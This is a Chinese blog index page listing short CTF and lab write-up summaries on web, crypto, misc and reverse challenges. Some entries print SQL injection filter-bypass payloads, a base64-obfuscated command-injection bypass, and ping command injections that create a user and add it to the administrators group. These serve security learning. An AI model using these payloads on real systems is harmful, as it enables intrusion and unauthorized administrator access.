自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(38)
  • 收藏
  • 关注

原创 BUUCTF--WEB(11~20)

注入'uunionnion sselectelect 1,2,(sselectelect group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema="geek")%23回显表为b4bsql和geekuser。令num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))获取flag。

2023-08-15 19:33:08 182

原创 SQLi-LABS(Basic Injections)

说明:以取得用户名和密码为通关。

2023-07-21 16:10:23 153

原创 ping命令注入

注入127.0.0.1&net localgroup administrators test /add将test用户加入administrators组。注入127.0.0.1&net user test 12345678 /add创建用户test。注入127.0.0.1&net user查看所有用户,结果中显示test用户创建成功。注入127.0.0.1&whoami判断是否存在rec漏洞(远程系统命令执行漏洞)。注入127.0.0.1&net user test查看test用户详细信息。

2023-07-15 09:14:16 380

原创 MySQL的基本使用

在xinghe数据库中创建一个表(school),指定字段uid(无符号整型且自增、主键)、name(非空)、class(非空);命令:create table school(uid int unsigned auto_increment primary key,name varchar(10) not null,class varchar(10) not null);命令:insert into school(name,class) values('shihao','2');查看dvwa数据库中的表;

2023-07-15 09:10:43 99

原创 pikachu靶场暴力破解

输入随意用户名和密码,但当验证码输入错误或为空时,Burp Suite捕获不到数据包,输入正确验证码,使用Burp Suite抓包。原理:由于验证码是前端验证,当验证码输入有误的情况下,数据包无法被捕获,只有当验证码正确,才能被捕获,此时验证码已经没有作用。原理:由于验证码是后端验证形式,当数据包被捕获后没有放行,则服务器后台没有更新新的验证码,可以借此绕过验证码进行爆破。(密码和token值为变量参数)将数据包发送至转发模块,随意输入错误验证,提示验证码有误,将验证码改为正确的,提示用户名和密码有误。

2023-07-14 10:20:15 63

原创 NSFFCTF--CRYPTO(1~10)

4、设x=a+b=sqrt(a^2+b^2+2ab),y=a-b=sqrt(a^2+b^2-2ab),a=(x+y)/2,b=(x-y)/2。分析代码:生成p,q为400位的素数,且q前200位是p后200位,后200位是p前200位。将flag进行RSA加密输出c和n。解压后得到一串密文,密文中出现:K=,当:K=ASCII码值分别加9,对应为CTF,推测密文经过移位加密,使用脚本得到flag。注意:因为ab是400位,根据不等式a^2+b^2>=2ab,则a^2+b^2必为401位,且第一个数为1。

2023-07-12 08:35:45 626

原创 CTF秀--愚人节欢乐赛

解压得到无后缀文件,010Editor查看,根据文件头(7B5C727466)确定是rtf文件,补充后缀rtf并打开。根据提示中三哈表示0则进行转换,3个哈转成0,<200c><200c><200c><200c><200c><200c><200d>哈哈哈表示1。得到flag,但发现复制下来的密文出现了变化,flag提交时也报错了,进入连接使用F12,找到密文,在复制下来解密,得到正确的flag。使用010Editor打开文件,根据文件头(PK)确定是zip文件,将文件重命名为zip文件。

2023-07-11 18:35:33 196

原创 CTF秀--新手杯

得到密文和提示,由于国内电话都是1开头,长度为12位,则使用1000000000000相减,得到的明文使用ctfshow{}格式包裹得到flag。查看提示文件1,得知文件进行了逆序,在线恢复逆序,使用010Editor查看文件是去头的png文件,补充头部,得到png模糊的图片。解压后得到一张图片,观察为图片被切割重组过,通过裁剪查看分割的高和原图的宽,再使用脚本将图片重组得到flag。解压文件被加密处理,双击查看得到提示,结合题目提示推出密码,解压得到三个文件。

2023-07-11 18:23:46 319

原创 CTF秀--七夕杯

根据题目内容提示将密文以-位置进行拆分。将密钥(后部分)以16进制转成2进制,再将密文使用脚本进行处理(对应密钥为1则大写,对应为0则小写)。得到一张图片,通过010Editor使用字符串搜索ctf,得到flag。进行base64解密得到flag。

2023-07-11 18:16:00 204

原创 CTF秀--年CTF

打开链接对PHP代码分析,使year=2022.时,==判断前先转换成字符串型判断为真,year+1后为浮点型,!==判断也为真,得到flag。通过分析密文首部和提示可以知道使用了Rabbit(兔)加密,提示也给出了密码(2023),使用Rabbit解密得到flag。

2023-07-11 18:13:12 175

原创 CTF秀--内部赛

官方WP:暂无。

2023-07-11 18:10:46 304

原创 CTF秀--萌新赛

官方WP:暂无。

2023-07-11 18:01:27 276

原创 BUUCTF--Web(1~10)

echo$IFS$9Y2F0IGZsYWcucGhwCg$IFS$9|base64$IFS$9-d$IFS$9|sh执行成功,同时查看源代码取出flag。使用php://input伪协议发现该伪协议被禁用,使用php://filter伪协议拿到base64源代码,使用basecrack进行解码得到源代码,flag就在其中。方法二:base64加密法(使用base64将cat flag.php加密绕过禁用)注意:这里不能只加密flag.php,因为echo写入是不会将$IFS$9转换成空格。

2023-07-11 08:31:14 265

原创 CTF秀--2023愚人杯

使用GET方式传入index.php查看源代码页面,但页面无法直接显示,进入源代码窗口,将base64密文进行解密得到index.php源代码,获得flag。文本文件中出现大量的四句话,推测是base4加密,使用脚本翻译出密文,base4有A(4,4)=24种排列,再使用脚本列出24种明文,找到flag。进入链接没有异常,F12进入控制台,查看url地址,发现是通过GET传入,传入前经过base64加密。压缩包存在加密,010Editor查看发现文件尾有key=,判断是密码,但经过base64加密,

2023-07-11 08:11:41 424

原创 CTF秀--单身杯

解压出来还有一个文本文件,打开发现里面没有e,根据上面文本的名字推测文本中的密文就是e(加密的)。得到解压后的文件打开其中的文本文件,根据提示使用敲击码解码,得到压缩包密码(还有一层加密),再根据提示暗示使用九键解密(手搓脚本)得到纯数字密码。根据题目提示是古典base,则尝试使用古典密码进行转换后进行base解密。将得到的密文进行转换(将大写改为小写并在大写字母后面添加一个空格),得到明文。摩斯解密后也进行九键解密得到e。通过图片中的小人可以得知是跳舞的小人密码,对照解密表进行解密。

2023-07-09 23:59:20 382

原创 CTF秀--PNG隐写入门赛

官方WP:暂无。

2023-07-09 23:54:01 2039

原创 CTF秀--菜狗杯

再使$_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]=system("cat /f*"),查看f开头的文件内容。令_GET=a,则有:$key=_GET,$value=a,有:$$key=$_GET=$$value=$a,可知使用GET传入_GET=flag可以得到flag。令cookie中传入CTFshow-QQ群:=a,则有$_POST['a'],令post中传入a=b,则有$_GET['b']。

2023-07-09 23:39:04 4658 2

原创 墨者学院在线靶场--WEB安全--SQL注入

测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。

2023-07-09 22:50:57 1640

原创 墨者学院在线靶场--网络安全

确定用户名和密码都为admin,进行登录得到提示进制登录,将插件X-Forwarded-For HeaderIP地址设置为127.0.0.1,再次登录得到key。进入超级链接,进行投票(只能投一次),使用插件X-Forwarded-For Header设置一个IP地址并进行投票,同时用Burp Suite.vbs抓包。使用Burp Suite.vbs进行爆破,再发送给服务器进行刷票(当IP不足时,可以更改前几位),再次登录可以得到key。打开Burp Suite.vbs,对超级链接进行抓包。

2023-07-09 11:17:37 264 1

原创 封神台--尤里的复仇Ⅰ小芳!

注入100 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='admin')回显admin表中的字段(Id、username、password )。注入100 union select 1,(select group_concat(username) from admin)回显admin表中username字段(admin、ppt领取微信 )。

2023-07-09 10:59:57 143 1

原创 BUUCTF--N1BOOK

尝试注入'and updatexml(1,concat(0x7e,(seLect group_concat(table_name) from information_schema.tables where table_schema='note'),0x7e),1)#将select关键字绕过,成功回显出表(fl4g和users)。注入'and updatexml(1,concat(0x7e,(seLect group_concat(flag) from fl4g),0x7e),1)#回显出flag。

2023-07-09 10:34:34 1015 1

原创 BUUCTF--Reverse(31~40)

代码中的提示base64经过变换,进入字符串后找到base64表,查看引用(点击进入,Ctrl+X),发现一个可疑函数(O_OLookAtYou),进入伪代码。sub_401050函数:为使返回为真,byte_403180=byte_403000,再将变换处理逆着处理,可以得到byte_403078。分析代码:主函数中有两个线程同时运行,StartAddress函数先运行,再sub_41119F函数运行,最后依次运行。exeinfope查看文件无壳,使用IDA打开文件并搜索字符串flag,取出flag。

2023-07-09 10:22:14 192 1

原创 BUUCTF--Reverse(21~30)

分析代码:byte_6CC0A0第一个字符与v1(前8位,v4[0])异或为f,byte_6CC0A3与v4[3]异或为g,对应flag第一和第四个字符。分析代码:伪代码中关键函数是sub_401080,只有v5=byte_40E0E4时,进入下面if时才提示flag正确。IDA查看脱壳后文件发现花指令,将花指令nop,即将call改为nop(E8改为90),再将相关txt编成函数(P键)。分析代码:sub_40100A()和sub_401019()代码分析推测是哈希算法。即(a1-16)为flag。

2023-07-08 23:33:36 244

原创 BUUCTF--Reverse(11~20)

分析代码:将v7~v16进行变换后为[51, 67, 69, 72, 74, 74, 83, 90, 90, 97, 110],得到String[0]=51+34='U',String[1]=74='J'。v4是v18通过base64加密得来的,解密后v18=jMp,则String[5]=j,String[6]=M,String[7]=p。得到flag.enc和pub.key文件,根据标题提示,推测是RSA加密,使用RSA解密脚本破解pub.key文件得到公钥(n,e)。

2023-07-08 23:13:03 336 1

原创 BUUCTF--Reverse(1~10)

exeinfope.exe查看文件,发现位数为32位,使用IDA32打开,Shift+F12找到flag。将脱壳后的文件用IDA32打开,Shift+F12寻到关键字符串,跳转到伪代码部分,分析代码得到flag。跳转到伪代码,分析代码并编写脚本爆破求出flag。exeinfope.exe查看文件,发现文件为带壳32位,使用FFI.exe进行脱壳。使用IDA64打开exe文件,再使用Shift+F12查看字符串,得到flag。exeinfope.exe查看文件为32位无壳,IDA32打开文件搜索字符串。

2023-07-08 22:51:03 1854

原创 BUUCTF--Misc(61~70)

使用Kinovea.exe打开mp4文件,通过word文件中的提示,定位到mp4文件的5秒左右位置(5.66)和7秒左右位置(7.36)得到有效信息。根据标题提示,分析后应该是键盘加密,但密文有不符合键盘加密的特征,最后发现是根据键盘位置连接为明文,即flag。得到压缩包无法解压(损坏),010Editor查看发现文件头的第一个和第二个字符反了,更改回来解压。提取zip文件并解压,得到文本,文本中含有大量表情符号,推测是Aaencode加密,解压得到docx文件,里面发现一串音符,知道是音符加密,

2023-07-08 22:30:06 327

原创 BUUCTF--Misc(51~60)

运行exe文件得到一个文本,文本中的内容提到NTFS,猜测是ntfs交换数据流,其中寄生文件是flag.txt,通过notepad命令查看宿主下面的寄生文件。解压得到一个文本,其余需要密码,根据文本中的提示,使用010Editor更改为EBCDIC编码(因为密文中较多有空格),取出密码。解压后发现文件损坏,010Editor查看,发现文件本是jpg文件,文件头前面数据被更改为png文件头,更改回来后得到flag。图片无异样,再通过010Editor查看图片,在文件末尾发现隐藏的rar文件,将其分离出来。

2023-07-08 22:18:32 781

原创 BUUCTF--Misc(41~50)

解压有两个gif文件,其中有一个无法打开,010Editor查看无法打开的gif文件,发现无法打开的gif无文件头,添加文件头,再查看gif文件取出flag。在第9流中发现zip文件信息,使用Foremost分解出zip文件,zip文件中有句提示,根据提示确定上面图片为密钥,解压出flag。得到一个无用的文本和一个损坏的gif文件,010Editor查看gif后,发现是缺少文件头,补充文件头修复文件。图片没有异常,010Editor查看,发现隐藏数据,分析是16进制数据,使用。

2023-07-08 22:05:12 235

原创 BUUCTF--Misc(31~40)

010Editor打开文件发现是zip文件,再搜索flag,得知文件中有flag.txt文件,更改后缀名解压,找到flag.txt取出flag。解压时发现需要密码,由于没有提示信息,则使用archpr.exe进行4位数字(一般情况)掩码爆破得到密码,解压取出flag。解压的图片和文本中没有有效信息,使用010Editor查看图片,发现隐藏zip文件,提取出来。Wireshark打开pcapng文件,搜索flag,再进行流跟踪,发现文件中存有rar文件。解压得到docx文件,里面有一张二维码,

2023-07-08 10:08:29 412

原创 BUUCTF--Misc(21~30)

打开key_part_one下的文件得到Brainfuck密文,使用https://www.splitbrain.org/services/ook解密得到半部flag。解压后得到vmdk文件,使用kali中7z命令解压文件,得到关键文件key_part_one和key_part_two。图片没有异样,使用010Editor打开图片查看最后部分得到特殊的二进制字符串,使用脚本转成ASCII码就是falg。根据标题提示,直接将解压文件送去火绒杀毒,找到存在后门的文件。

2023-07-08 09:52:00 278

原创 BUUCTF--Misc(11~20)

使用010Editor打开图片,搜索flag,得到的flag经过base64加密,使用basecrack解密得到flag。使用Wireshark打开pcapng文件,使用Ctrl+F搜索flag.(因为提示说是个文件),找到flag.jpg。分离出来的zip设有密码,通过题目提示使用archpr.exe进行4位数掩码爆破,取得flag。将解压到的图片使用Stegsolve.jar打开,发现有LSB隐写,整理数据得到flag。对flag.jpg进行流量追踪,再搜索flag{,得到flag。

2023-07-08 09:39:25 234

原创 BUUCTF--Crypto(61~70)

分析代码:flag被分为两部分F1、F2,c1(F1+F2)经过RSA加密后为m1,c2(F1^3+F2^3)经过RSA加密后为m2。明文无法utf-8编码,观察发现明文中以3个数字或2个数字为一组,进行ASCII转字符,得到flag。打开doc文件,对比文件中的内容,发现其中有两段文字大致一样,将不同的字符一一对应形成密码表。分析密文:字母表示日历上的星期(即列数),T和S有两个,则T1表示第一个,T2表示第二个。得到c1=F1+F2,c2=F1^3+F2^3后,使用脚本求出F1和F2,即flag。

2023-07-07 19:39:27 564 2

原创 BUUCTF--Crypto(51~60)

根据标题提示、数字范围(9以内)、每组数字个数(4以内),确定使用九宫格键加密,使用脚本求解。解压后使用pycharm打开py文件,而文本文件中是py文件的输出(p、q、c),直接用RSA解密脚本求出flag。打开文本有3组N和c,发现密文中数字不超过5,则断定为5进制,先进行进制转换,再使用RSA解密脚本求出flag。根据标题提示,将文本中的密文对照天干地支表并加上一甲子(60),使用脚本将其转换成字符,即flag。文本中有一串密文,根据提示:曼联,确定是曼彻斯特编码,使用脚本进行解码得到flag。

2023-07-07 19:28:05 333 1

原创 BUUCTF--Crypto(41~50)

再通过hint文本中的提示,可以知道还有加密,根据密文特征猜测是base32,提示中的一句疑问,判断凯撒移位为3(因为凯撒最初是固定移3位,若判断不出来则全部试一下)。提示中说数字串是关键且flag长度为32位数字,则猜测数字串是根据斐波那契数列乱序排列的,使用及脚本恢复数字串顺序,即flag。密文是一组字符串,通过观察和标题提示,字母都在26键的第1行(有10个)中,则可以确定每个字母对应各自上方的数字。文本文件中有两组数据,长度都为32,根据提示:数字列,可能与排列有关,脚本排列发现是斐波那契数列。

2023-07-07 19:17:53 545 1

原创 BUUCTF--Crypto(31~40)

将最后一个字符N+47=},可以判断使用了移位加密,又通过v+47=¥,则确定不是普通移位加密,而是ROT47加密(ASCII码只取33~126)。使用文本打开文件,发现16进制的n(最后的L表示long类型),e,c,使用脚本转换成10进制,再使用RSA解密脚本求解m,即flag。得到文件使用文本打开,发现16进制的p+q、(p+1)*(q+1)、d、c,转换成10进制后通过RSA解密脚本求出flag。使用pycharm打开py文件,得到p、q、e、c,RSA解密脚本得到flag。

2023-07-07 19:04:03 248 1

原创 BUUCTF--Crypto(21~30)

得到文本是一个加密后的用户名和密码,一般用户名和密码使用的是MD5加密,根据提示使用。密文只有三个未知字符,可以直接使用脚本爆破,得到密文的MD5,即flag。注意:密文中是中文乱码,不可以直接将字符串进行异或,所以使用文本方式读出。题目给出p,q,dp,dq和c,直接使用RSA解密脚本求出flag。解密得到一串6进制字符串,使用Hex加解密脚本得到flag。根据标题推测使用的是异或加密,使用脚本解密得到flag。拿到数据直接上RSA解密脚本得到flag。使用RSA解密脚本直接求得flag。

2023-07-07 18:50:44 305 1

原创 BUUCTF--Crypto(11~20)

根据关系S转成F相隔13,则密文中C应转换成P,再次使用CTFcracktools.jar进行解密,选择首字母是P的词为flag。根据题目中信息罗马人的加密方法,只能是凯撒加密,使用CTFcracktools.jar进行解密,在进行翻译寻找到有意义的词。标题提示是古典密码,常见的古典密码有栅栏和凯撒,使用CTFcracktools.jar进行栅栏和凯撒解密,得到flag。文本中是一串数字密文,通过题目提示flag是一串中文,则推测是中文电码,使用网站。根据题目提示,直接使用凯撒,无flag,再使用网站。

2023-07-07 18:40:22 288 1

原创 BUUCTF--Crypto(1~10)

解压得到密文和flag格式,通过分析密文前4个字符与flag这4个字符对应的差值,确定密文的ASCII码值依次增加了5,6,7,8,使用脚本解出密文得到flag。解码得到一串密文,密文形式类似flag{...},使用CTFcracktools.jar进行凯撒解密得到flag。解压得到提示,根据提示确定flag有10位,使用姓名拼音首字母zs加生日得到flag。解压得到一串密文,密文中出现大量%,确定为URL解密,通过网站。进行MD5解密,得到flag。进行摩斯解密,得到flag。解密,得到flag。

2023-07-07 18:23:55 279 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除